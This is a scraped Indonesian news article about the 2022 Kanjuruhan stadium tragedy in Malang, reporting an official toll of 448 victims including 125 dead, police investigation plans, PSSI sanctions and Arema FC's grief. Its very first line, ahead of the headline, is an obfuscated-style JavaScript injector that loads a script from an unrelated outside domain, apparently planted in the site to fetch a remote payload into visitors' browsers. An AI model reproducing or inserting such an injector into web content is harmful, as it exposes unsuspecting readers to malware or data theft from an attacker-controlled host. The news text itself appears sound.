(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Fix! Total Korban Tragedi Kanjuruhan 448 Orang, Tewas 125 dan Sisanya Luka-luka


KANALKALIMANTAN.COM, MALANG – Update korban tragedi sepak bola di Kanjuruhan Malang disampaikan Menteri Koordinator Bidang Pembangunan Manusia dan Kebudayaan Indonesia Muhadjir Effendy. Total korban dalam tragedi itu mencapai 448 orang.

Data seluruh korban itu meliputi korban tewas, luka berat, hingga luka ringan. Mereka tewas dalam kerusuhan di Kanjuruhan usai laga antara Arema FC vs Persebaya Surabaya. Dalam laga pekan ke-11 itu Arema kalah 2-3 dari Persebaya.

Dari jumlah itu, sebanyak 125 orang meninggal dunia, sementara 302 orang luka ringan, 21 orang luka berat. “Sehingga total korbannya 448 orang. Dengan penjelasan resmi ini tidak ada spekulasi-spekulasi tentang jumlah korban,” kata Muhadjir Effendy, Minggu (2/10/2022) malam.

Data itu, lanjut Muhajir Efendi, sudah diverifikasi oleh tim dari Polri, rumah sakit dan pihak penyelenggara. Dengan demikian, spekulasi tentang jumlah korban yang beredar sebelumnya tidak benar.

 

Baca juga  : Kapolri Pastikan Korban Tewas Tragedi Kanjuruhan 125 Orang

Data soal korban ini disampaikan Muhadjir Effendy dalam rapat koordinasi dengan berbagai pihak, mulai Kapolri, Menpora, Gubernur Jawa Timur Khofifah, PSSI dan Komisi X DPR RI.

Adapun untuk penanganan kasus, polri akan melakukan langkan investigasi. “Kami telah membawa tim dari Mabes, tim gabungan, tim penyidik dari Bareskrim, Propam untuk audit internal. Juga ada tim lain akan melakukan langkah-langkah penyelidikan,” kata Kapolri Listyo Sigit Prabowo.

Sementara itu, Ketua PSSI Iwan Bule mengatakan Arema FC dikenai sanksi tidak boleh menggelar pertandingan di Kanjuruhan. Kemudian Ia juga mengatakan Liga I sementara dihentikan sementara untuk menunggu proses investigasi.

Terkait sanksi PSSI ini, manajemen Arema FC tidak peduli. Manajer Arema FC Ali Rifki mengatakan lebih berfokus pada keluarga korban dan korban.

 

Baca juga : MI Integral Al-Ukhuwwah Banjang Gelar Seminar Parenting Tumbuh Kembang Anak

“Saya dari manajemen tidak peduli dan tidak memikirkan sanksi. Yang saya pikirkan keluarga korban dan korban,” ujarnya saat mendatangi Stadion Kanjuruhan, Minggu (2/10/2022) petang.

Saat bertemu awak media, Ali terlihat menahan tangis. Ucapannya pun terdengar terbata-bata. Ia juga mengucapkan belasungkawa atas insiden nahas ini.

“Teman-teman turut berduka cita, sesuatu hal yang tidak kita inginkan bersama,” ujarnya.

Ali mengaku, dirinya juga turut menggotong jenazah aremania saat peristiwa itu terjadi. “Banyak yang meninggal, saya ikut angkat jenazah. Ini pukulan besar bagi kita semua,” imbuhnya.

 

Baca juga  : TRAGEDI KANJURUHAN: Kematian Terbesar Kedua Ajang Sepak Bola di Dunia

Rencananya, manajemen dan tim akan mendatangi para korban satu per satu pada esok hari, Senin (3/10/2022).

“Tim akan diajak bareng ke para korban. Saya kira tim dan pemain semuanya shock. Tidak ada yang menginginkan ini,” ujarnya menambahkan.

Sementara itu, duka cita terkait tragedi ini datang dari berbagai pihak. Bahkan Bonek–suporter Persebaya Surabaya–bisa dibilang rival abadi Aremania punya menyampaikan duka cita mendalam. (Suara.com)

Editor : kk


Desy Arfianty

Recent Posts

Jelang Penilaian Satu Wasaka Award, Bappedalitbang Mantapkan Persiapan

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar menggelar rapat… Read More

21 menit ago

Bimtek Peningkatan Kapasitas Tim Penggerak PKK Desa

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan membuka kegiatan Bimbingan… Read More

1 jam ago

Tak Bernyawa Dalam Kabin Truk di Jalan Jeruk Sungai Ulin

KANALKALIMANTAN.COM, BANJARBARU - Sesosok lelaki tak bernyawa didapati dalam kabin truk gegerkan warga Jalan Jeruk… Read More

2 jam ago

Bukan Kader Parpol, Lisa Halaby Berani Lamar Banyak Parpol

KANALKALIMANTAN.COM, BANJARBARU - Langkah dari figur non partai politik (Parpol) Lisa Halaby melamar ke banyak… Read More

4 jam ago

Pembongkaran Tanpa Perlawanan, Pedagang Rela Asal Masih Bisa Berjualan

KANALKALIMANTAN.COM, BANJARMASIN - Pembongkaran lapak pedagang di badan Jalan Pasar Lama Laut, Kecamatan Banjarmasin Tengah,… Read More

6 jam ago

BREAKING NEWS: Satpol PP Banjarmasin Bongkar Lapak Pedagang di Pasar Lama Laut

KANALKALIMANTAN.COM, BANJARMASIN - Petugas Satpol PP Banjarmasin melakukan eksekusi pembongkaran bangunan dan lapak dagangan warga… Read More

7 jam ago

This website uses cookies.